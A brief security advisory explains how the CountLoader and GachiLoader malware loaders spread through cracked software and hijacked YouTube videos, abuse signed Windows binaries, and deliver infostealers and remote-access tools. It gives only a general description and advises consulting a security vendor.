Cracked software and YouTube videos spread CountLoader & GachiLoader malware

What It Is

CountLoader and GachiLoader are malware loaders, a type of Trojan designed to bring additional malicious code onto a victim's computer. Both are described as fileless and rely on signedbinary abuse, meaning they try to hide their activity by using legitimate Windows binaries that already have a trusted signature. While some operations occur in memory, the loaders still download components and may create persistence mechanisms such as scheduled tasks, so they are not strictly fileless in the purest sense.

Who's Targeted

• Windows endpoints any PC running a supported version of Microsoft Windows.
• People who download cracked or pirated software. The malicious loaders are often bundled with these illegal copies.
• Viewers of compromised YouTube videos. Certain video pages have been hijacked to serve the payload to anyone who watches them.

How It Works

The infection chain typically starts with a user seeking free, cracked applications. Those downloads are frequently packaged with CountLoader or GachiLoader. When the installer runs, the loader invokes legitimate, signed Windows binaries (for example mshta.exe or PowerShell) to execute code without writing traditional files to disk. This is the signedbinary abuse technique that helps the malware stay under the radar.

YouTube Distribution

In parallel, malicious actors have hijacked or taken control of YouTube accounts and embed malicious download links in video descriptions or comments. When a viewer clicks the link or a hidden script is triggered, the loader is downloaded and executed using the same signedbinary approach.

What It Does

Once the loader is active on the system, it fetches and installs additional malware. Typical secondary payloads include:

• Infostealers such as Rhadamanthys or ACR Stealer.
• Backdoors and remoteaccess tools, for example Cobalt Strike or other RATs.
• Other modules chosen by the operator, depending on the campaign's objectives.

The primary goal of a loader is to give the attacker a foothold for further actions such as data theft, credential harvesting, or ransomware deployment.

How To Protect

Because specific mitigation steps are not listed for this threat, the most reliable advice is to consult your security vendor. A professional security service can provide detection signatures, behavioural analytics and remediation guidance tailored to the signedbinary abuse techniques used by CountLoader and GachiLoader.

Conclusion

CountLoader and GachiLoader illustrate how cybercriminals exploit the trust placed in legitimate Windows binaries to slip malicious code onto everyday computers. Their primary victims are users who download cracked software or watch manipulated YouTube videos a reminder that free or pirated content can carry hidden dangers. While detailed mitigation advice is not provided, reaching out to a trusted security vendor remains the best step to detect and remove these loaders, keeping your Windows system safe from further compromise.